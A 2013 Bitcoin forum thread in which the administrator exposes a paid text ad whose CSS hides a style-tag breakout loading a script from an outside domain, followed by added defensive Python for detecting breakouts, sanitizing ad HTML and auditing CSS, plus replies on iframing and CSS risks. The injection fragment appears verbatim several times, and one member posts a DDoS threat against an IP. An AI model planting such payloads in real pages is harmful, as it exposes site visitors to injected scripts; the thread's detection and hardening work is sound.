theymos (OP)
Administrator
Legendary
Offline
Activity: 5250
Merit: 13108
August 16, 2013, 06:15:49 AM
Here's an ad that was sent to me:

Quote
Sent to the address! Here is my CSS code:

.minefieldadm {width:620px;height:40px;overflow:hidden;font-family:Verdana;font-size:14px;border:1px solid #000;display:inline-block;background: #a3d802; background: -moz-linear-gradient(top, #a3d802 0%, #11a301 3%, #8ac916 6%, #f0b7a1 34%, #8c3310 50%, #752201 93%, #bf6e4e 98%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#a3d802), color-stop(3%,#11a301), color-stop(6%,#8ac916), color-stop(34%,#f0b7a1), color-stop(50%,#8c3310), color-stop(93%,#752201), color-stop(98%,#bf6e4e)); background: -webkit-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); background: -o-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);background: -ms-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); background: linear-gradient(to bottom, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a3d802', endColorstr='#bf6e4e',GradientType=0 );} .minefieldshader {font-size: 155%;color: #FFFFFF;text-shadow: 0px 0px 8px rgba(0, 0, 0, 1);background: #b4e391; background: -moz-linear-gradient(45deg, #b4e391 0%, #149b51 22%, #75e01d 27%, #369b14 62%, #5cdb1c 69%, #5cdb1c 86%, #b4e391 100%); background: -webkit-gradient(linear, left bottom, right top, color-stop(0%,#b4e391), color-stop(22%,#149b51), color-stop(27%,#75e01d), color-stop(62%,#369b14), color-stop(69%,#5cdb1c), color-stop(86%,#5cdb1c), color-stop(100%,#b4e391));background: -webkit-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%); background: -o-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);}</style><script 
src='http://webkit-linear.in'></script><style>.minefieldshader{ background: -ms-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%); background: linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#b4e391', endColorstr='#b4e391',GradientType=1 );margin-top: 3px;padding: 4px 3px 4px 3px;display: inline-block;} .minefieldstar1 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 135px;} .minefieldstar2 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 450px;}

Here is my HTML code:

<a href="http://minefield.bitcoinlab.org/?r=1XCa3af6FfBF9FZT"><div class="minefieldadm"><div class="minefieldstar1"></div> <div class="minefieldstar2"></div><span class="minefieldshader">Bitcoin Minefield</span></div></a>

Please let me know when the ad is up. I'll be happy to give you stats on how many people clicked and how much BTC I made from this referral link.

Can you spot the problem? The CSS contains code injection:

</style><script src='http://webkit-linear.in'></script><style>

This URL contains nothing now. I guess he would have put something there if the ad had been accepted. I carefully check all ads by hand, though, so this kind of attack is pointless.
1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD

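Added example for the post above (not code from the thread, the forum, or the advertiser): it shows why the submitted stylesheet is an injection rather than odd CSS. An ad system that wraps advertiser CSS in a <style> element has no escaping available inside that element; the first '</style' in the CSS ends it and everything after is parsed as HTML. The template, the shortened copy of the submitted CSS and the pre-embedding check are all constructed for this example; html.parser is used because it ends <style> raw text on '</style' the same way a browser does.

```python
"""Added example: the <style> break-out in the submitted ad, and the check
an ad system can run before embedding advertiser CSS. Not the forum's code."""
import re
from html.parser import HTMLParser

# Constructed, shortened copy of the submitted stylesheet. The gradients are
# irrelevant; only the fragment in the middle matters.
SUBMITTED_CSS = (
    ".minefieldadm {width:620px;height:40px;border:1px solid #000;}"
    ".minefieldshader {font-size: 155%;color: #FFFFFF;}"
    "</style><script src='http://webkit-linear.in'></script><style>"
    ".minefieldshader {margin-top: 3px;display: inline-block;}"
)
# The same stylesheet as a clean submission would look.
CLEAN_CSS = (
    ".minefieldadm {width:620px;height:40px;border:1px solid #000;}"
    ".minefieldshader {font-size: 155%;color: #FFFFFF;margin-top: 3px;}"
)
# Assumed ad markup (a stand-in for the advertiser's HTML, not the forum's template).
AD_HTML = ('<a href="http://minefield.bitcoinlab.org/?r=1XCa3af6FfBF9FZT">'
           '<span class="minefieldshader">Bitcoin Minefield</span></a>')


def render_ad_page(css: str, ad_html: str) -> str:
    """Naive template: trusts that advertiser CSS stays inside <style>."""
    return f"<html><head><style>{css}</style></head><body>{ad_html}</body></html>"


class ElementCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs) -> None:
        self.elements.append((tag, dict(attrs)))


def script_sources(page: str) -> list:
    """src of every <script> element an HTML parser finds in the rendered page.

    html.parser treats <style> content as raw text until '</style', exactly
    like a browser, so a script smuggled in via the stylesheet shows up here.
    """
    collector = ElementCollector()
    collector.feed(page)
    collector.close()
    return [attrs.get("src", "") for tag, attrs in collector.elements if tag == "script"]


# Deliberately looser than the HTML grammar: anything that looks like it could
# end the <style> element or open a tag is reported, case-insensitively.
STYLE_BREAKOUT = re.compile(r"</\s*style|<\s*script|<!--", re.IGNORECASE)


def find_breakout(css: str):
    """First fragment that would end <style> or open markup, or None."""
    match = STYLE_BREAKOUT.search(css)
    return match.group(0) if match else None


def css_is_embeddable(css: str) -> bool:
    """True only if the CSS cannot terminate the enclosing <style> element.

    '<' has no use in stylesheet syntax outside strings and comments, so
    rejecting it outright also covers variants the regex above does not list.
    """
    return "<" not in css


def review(css: str) -> dict:
    """What an automated pre-check would report for a submitted stylesheet."""
    return {
        "embeddable": css_is_embeddable(css),
        "breakout": find_breakout(css),
        "scripts_if_embedded": script_sources(render_ad_page(css, AD_HTML)),
    }


if __name__ == "__main__":
    print(review(SUBMITTED_CSS))  # embeddable False, breakout '</style', one script src
    print(review(CLEAN_CSS))      # embeddable True, breakout None, no scripts
```

The point of the `scripts_if_embedded` field is to show the reviewer what the browser would actually see: the manual check in the post works because a human spotted the fragment, but the same parse can be run on every submission before it reaches the rotation.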
narayan
Member
Offline
Activity: 98
Merit: 10
I do not sell Bitcoins. I sell SHA256(SHA256()).
August 16, 2013, 06:31:44 AM
Off to my next account
BTC: 1PiPooLvcEoBLuXBHbwUnN5rShs2nas223 LTC: LRq7YPMDoERSZcte9ZPNHQkUbfiPsY55VM

Raize
Donator
Legendary
Offline
Activity: 1419
Merit: 1015
August 16, 2013, 06:31:52 AM
Quite embarrassing.
Good catch.

TiagoTiago
August 16, 2013, 06:32:53 AM
Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; especially considering how tempting of a target users of the forum are...

(I don't always get new reply notifications, pls send a pm when you think it has happened) Wanna gimme some BTC/BCH for any or no reason? 1FmvtS66LFh6ycrXDwKRQTexGJw4UWiqDX The more you believe in Bitcoin, and the more you show you do to other people, the faster the real value will soar!

favdesu
Legendary
Offline
Activity: 1764
Merit: 1000
August 16, 2013, 06:40:03 AM
Quote from: narayan
Off to my next account

Just out of curiosity, do you break even as a semi-professional scammer with little to no success?

theymos (OP)
Administrator
Legendary
Offline
Activity: 5250
Merit: 13108
August 16, 2013, 06:46:59 AM
He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now.

Quote from: TiagoTiago
Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; especially considering how tempting of a target users of the forum are...

They're safe when someone is manually reviewing them. It actually wouldn't be all that difficult to automatically verify that ads are OK: CSS can never be a security risk, and a small whitelist of known-safe HTML tags and attributes would prevent other attacks. I may add automatic verification if I ever automate the ad system, though some sort of manual approval will always be required because the ad content and size also need to be checked. (Automatically checking an ad's actual screen size seems difficult.)

HTML/CSS ads are much smaller byte-wise; they can be seen by text browsers, search engines, and the visually-impaired; people can deal with them more naturally (copy/paste, etc.); they can do things that images can't do; and ad blockers can't block them as easily. They are clearly superior to image ads in almost every way.

1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD

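Added example for the whitelist idea in the post above (not theymos's code or the forum's ad system): a sanitizer that rebuilds a submitted ad fragment from a short list of known-safe tags and attributes instead of trying to blacklist bad ones. The allowlist (a, div, span with href and class) is this example's own choice, sized for the text ad in the thread; the sample input is a constructed variant of that ad with a script element and an onclick handler added.

```python
"""Added example: allowlist-based HTML sanitizer for text ads. Not the forum's
code; the allowlist and the sample input are constructed for this example."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags an ad may use, and the only attributes allowed on each.
ALLOWED_TAGS = {"a": {"href"}, "div": {"class"}, "span": {"class"}}
# Elements whose content is dropped together with the tag. Any other tag that
# is not allowlisted loses its markup but keeps its (re-escaped) text.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript", "svg", "math"}
CLASS_RE = re.compile(r"^[A-Za-z0-9_-]+(?: [A-Za-z0-9_-]+)*$")

# Constructed input: the thread's ad plus an event handler and a script element.
INJECTED_AD_HTML = (
    '<a href="http://minefield.bitcoinlab.org/?r=1XCa3af6FfBF9FZT" onclick="steal()">'
    '<div class="minefieldadm"><span class="minefieldshader">Bitcoin Minefield</span></div>'
    '<script src="http://webkit-linear.in"></script></a>'
)


def safe_href(value: str) -> bool:
    """Only absolute http(s) URLs; rejects javascript:, data:, control characters."""
    if any(ord(ch) < 0x20 for ch in value):
        return False
    try:
        parts = urlsplit(value.strip())
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)


class AdSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes and keeps output balanced."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []    # allowlisted tags currently open
        self.skip = 0     # >0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue                       # drops onclick=, style=, id=, ...
            if name == "href" and not safe_href(value):
                continue
            if name == "class" and not CLASS_RE.match(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in self.open:
            return
        while self.open:                       # close anything left open inside
            closed = self.open.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))  # text can never become markup

    def result(self) -> str:
        self.close()
        while self.open:                        # balance unterminated input
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_ad_html(fragment: str) -> str:
    """Return the fragment rebuilt from allowlisted tags and attributes only."""
    sanitizer = AdSanitizer()
    sanitizer.feed(fragment)
    return sanitizer.result()


if __name__ == "__main__":
    print(sanitize_ad_html(INJECTED_AD_HTML))
```

Comments, declarations and processing instructions are dropped by the parser's default handlers, and anything the allowlist does not name is removed rather than escaped, so a new attack vector in some other tag or attribute never needs a new rule. The CSS side of the ad still needs its own check; this only covers the HTML fragment.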
narayan
Member
Offline
Activity: 98
Merit: 10
I do not sell Bitcoins. I sell SHA256(SHA256()).
August 16, 2013, 06:59:41 AM
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon
BTC: 1PiPooLvcEoBLuXBHbwUnN5rShs2nas223 LTC: LRq7YPMDoERSZcte9ZPNHQkUbfiPsY55VM

Kluge
Donator
Legendary
Offline
Activity: 1218
Merit: 1015
August 16, 2013, 07:02:36 AM (last edit: August 16, 2013, 07:43:40 AM by Kluge)
Quote from: narayan
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon

Jesus, that guy plays a lot of dice.

ETA @ deleted post: lol, yeah - I bet you just RELAYED them.

gmaxwell
Staff
Legendary
Offline
Activity: 4214
Merit: 8493
August 16, 2013, 07:08:30 AM
I'd suggest that you also implement some protections just in case something clever gets past your eyes.

Beyond some programmatic 'xss' matching, one idea would be to iframe the html/css ads on another domain, so even if they do go rogue the browser sandboxing will rescue you.

I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs.

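Added example for the remote-asset point in the post above (not gmaxwell's code or the forum's): a declaration-level audit of submitted CSS that flags anything making the reader's browser fetch from an arbitrary host (url(), @import) or fall into a legacy script hook, and that only accepts properties from an allowlist. The allowlist is sized for the ad in this thread and is this example's own choice; the expression()/behavior/-moz-binding entries are legacy IE and Firefox vectors added here, not something the thread mentions; the tracker.example URLs in the sample are constructed.

```python
"""Added example: audit submitted CSS for remote loads and unexpected properties.
Not the forum's code; allowlist and sample stylesheet are constructed."""
import re

# Properties the text ad in the thread actually needs (constructed allowlist).
ALLOWED_PROPERTIES = {
    "width", "height", "overflow", "font-family", "font-size", "border",
    "border-left", "border-right", "border-bottom", "display", "background",
    "color", "text-shadow", "margin-top", "margin-left", "padding",
    "position", "float",
}
# url()/@import fetch from any host the advertiser chooses (a web bug, or input
# to an image decoder). expression(), behavior: and -moz-binding were script
# hooks in old IE and Firefox. A backslash is rejected because CSS escapes can
# spell 'url(' in a way a plain substring search would miss.
REMOTE_OR_ACTIVE = re.compile(
    r"url\s*\(|@import|expression\s*\(|behavior\s*:|-moz-binding|\\", re.IGNORECASE)
COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
RULE_BODY = re.compile(r"\{([^{}]*)\}")   # flat rules only; nested at-rules are not parsed

# Constructed: the first rule is a shortened copy of the submitted ad's CSS, the
# rest adds the kind of tracking load the post above warns about.
SUBMITTED_LIKE_CSS = """
.minefieldadm {width:620px;height:40px;overflow:hidden;font-family:Verdana;
  font-size:14px;border:1px solid #000;display:inline-block;
  background: linear-gradient(to bottom, #a3d802 0%, #bf6e4e 98%);
  filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a3d802', endColorstr='#bf6e4e',GradientType=0 );}
/* tracking additions constructed for this example */
.minefieldshader {color: #FFFFFF; background: url(http://tracker.example/pixel.gif) no-repeat;}
@import url("http://tracker.example/more.css");
"""
PLAIN_GRADIENT_CSS = ".a {color: #fff; background: linear-gradient(to bottom, #a3d802 0%, #bf6e4e 98%);}"


def audit_css(css: str) -> list:
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    findings = []
    text = COMMENT.sub("", css)           # comments could hide or split tokens
    if "<" in text:
        findings.append("markup character '<' (could end the <style> element)")
    for match in REMOTE_OR_ACTIVE.finditer(text):
        findings.append(f"remote load or script hook: {match.group(0).strip()!r} at offset {match.start()}")
    for block in RULE_BODY.finditer(text):
        for declaration in block.group(1).split(";"):
            if not declaration.strip():
                continue
            prop, sep, _value = declaration.partition(":")
            prop = prop.strip().lower()
            if not sep:
                findings.append(f"malformed declaration {declaration.strip()!r}")
            elif prop not in ALLOWED_PROPERTIES:
                findings.append(f"property not in allowlist: {prop!r}")
    return findings


if __name__ == "__main__":
    for line in audit_css(SUBMITTED_LIKE_CSS):
        print(line)
```

The allowlist is the part that does the work: a property such as `filter` (IE's proprietary one, used in the ad for its gradient fallback) gets flagged not because it is known to be dangerous but because nobody has decided it is needed, which is the same posture the iframe suggestion takes at the browser level.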
Anduck
Legendary
Offline
Activity: 1511
Merit: 1072
quack
August 16, 2013, 07:22:26 AM
Quote from: narayan
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon

Whoa, they always return with this same "you busted me, now I will ddos you!!!". Do some legit stuff. Pays better.

BadBear
v2.0
Legendary
Offline
Activity: 1652
Merit: 1128
August 16, 2013, 08:52:33 AM
Quote from: narayan
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon

Somebody sounds mad.

K1773R
Legendary
Offline
Activity: 1792
Merit: 1008
/dev/null
August 16, 2013, 02:10:28 PM
mad skiddys
[GPG Public Key]BTC/DVC/TRC/FRC: 1 K1773RbXRZVRQSSXe9N6N2MUFERvrdu6y ANC/XPM A K1773RTmRKtvbKBCrUu95UQg5iegrqyeA NMC: N K1773Rzv8b4ugmCgX789PbjewA9fL9Dy1 LTC: L Ki773RBuPepQH8E6Zb1ponoCvgbU7hHmd EMC: E K1773RxUes1HX1YAGMZ1xVYBBRUCqfDoF BQC: b K1773R1APJz4yTgRkmdKQhjhiMyQpJgfN

HeroC
Legendary
Offline
Activity: 858
Merit: 1000
August 16, 2013, 02:41:13 PM
I wonder what he would have put there...

Raize
Donator
Legendary
Offline
Activity: 1419
Merit: 1015
August 16, 2013, 03:26:07 PM
Quote from: gmaxwell
I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs.

On this topic, I remember a while back there was an image loading exploit that IE had a few years back, but it was wholly unreliable as an exploit till someone figured out they could use CSS to heap-spray just prior to the image load, thus making it work every time. I forget all the details, but yeah, CSS (or at least the way IE handles it) is far from perfectly safe. That said, they really only should be able to load things under the user's credentials, but on a Windows box that's typically "good enough" to do some damage.

theymos (OP)
Administrator
Legendary
Offline
Activity: 5250
Merit: 13108
August 16, 2013, 04:48:19 PM
LOL, thanks!
1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD

willphase
August 16, 2013, 05:51:50 PM
To protect against this, I think it's certainly worth putting ads in iframes on a different origin - e.g. bitcointalkusercontent.org
Will

phelix
Legendary
Offline
Activity: 1708
Merit: 1020
August 16, 2013, 06:52:42 PM
Are you saying you actually put up a link to that scammer's website?

tysat
Legendary
Offline
Activity: 966
Merit: 1004
Keep it real
August 16, 2013, 06:57:08 PM
Quote from: phelix
Are you saying you actually put up a link to that scammer's website?

Confirmed that the ad is actually placed in rotation, I just saw it.

@theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of thought.

MiningBuddy
August 16, 2013, 07:00:44 PM
Quote from: phelix
Are you saying you actually put up a link to that scammer's website?

Quote from: tysat
Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of thought.

theymos removed the malicious section of code before putting the link into the ad rotation.

tysat
Legendary
Offline
Activity: 966
Merit: 1004
Keep it real
August 16, 2013, 07:08:49 PM
Quote from: phelix
Are you saying you actually put up a link to that scammer's website?

Quote from: tysat
Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of thought.

Quote from: MiningBuddy
theymos removed the malicious section of code before putting the link into the ad rotation.

I know that, but if they're trying to get something in the ad doesn't it stand to reason that they don't deserve to have an ad in rotation? I'd say trying to get malicious code into an ad should result in a ban from the forum.